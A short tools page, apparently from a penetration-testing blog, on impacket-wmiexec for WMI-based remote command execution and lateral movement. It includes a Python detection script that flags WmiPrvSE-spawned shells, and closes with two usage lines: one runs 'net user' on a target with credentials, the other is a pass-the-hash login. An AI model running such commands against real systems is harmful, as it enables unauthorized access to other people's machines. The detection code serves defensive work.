Tools | February 9, 2026 | 1 min read | by 0xt0pus

impacket-wmiexec

Remote command execution using WMI for stealthy lateral movement without writing to disk


Impacket-wmiexec

Description

Impacket-wmiexec executes commands remotely on Windows machines via WMI (Windows Management Instrumentation). Unlike psexec, it does not create a service on the target, which makes it slightly stealthier.
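"Slightly stealthier" still leaves process-creation telemetry. This added example (not from the original page or the Impacket project) flags events matching wmiexec's commonly documented default footprint: a shell spawned by WmiPrvSE.exe with output redirected to a `__<timestamp>` file on the ADMIN$ share. The event records and field names are constructed, and the exact command-line shape is an assumption that can vary with Impacket version and options.

```python
import re

# Assumed default shape: cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<epoch> 2>&1
WMIEXEC_CMDLINE = re.compile(
    r"(?i)cmd\.exe\s+/Q\s+/c\s+(?P<command>.*?)\s+1>\s+"
    r"\\\\(?P<host>[^\\\s]+)\\(?P<share>[A-Za-z]+\$)\\(?P<outfile>__\d+\.\d+)\s+2>&1")

# Constructed process-creation events (shape loosely follows Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"host": "SRV02", "user": "CORP\\Administrator",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c net user 1> \\127.0.0.1\ADMIN$\__1739092801.4821 2>&1"},
    {"host": "SRV03", "user": "NT AUTHORITY\\NETWORK SERVICE",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\wbem\mofcomp.exe", "cmdline": "mofcomp.exe inventory.mof"},
    {"host": "SRV04", "user": "CORP\\svc_backup",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\scripts\inventory.bat"},
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return (severity, detail): 'high' for the redirect pattern, 'medium' for any WMI-spawned shell."""
    wmi_parent = basename(event["parent"]) == "wmiprvse.exe"
    match = WMIEXEC_CMDLINE.search(event["cmdline"])
    if wmi_parent and match:
        return "high", {"command": match["command"], "outfile": match["outfile"], "share": match["share"]}
    if wmi_parent and basename(event["image"]) in {"cmd.exe", "powershell.exe"}:
        return "medium", {"command": event["cmdline"]}
    return None, {}

def detect(events):
    hits = []
    for ev in events:
        severity, detail = classify(ev)
        if severity:
            hits.append({"host": ev["host"], "user": ev["user"], "severity": severity, **detail})
    return hits

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The medium tier catches WMI-spawned shells that lack the redirect pattern. Legitimate management tooling also produces these, so they need tuning against a local baseline.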

Usage 1: Execute Command with Credentials

Command:

impacket-wmiexec DOMAIN/username:Password@TARGET "net user"

Usage 2: Pass the Hash

Command:

/usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.145.72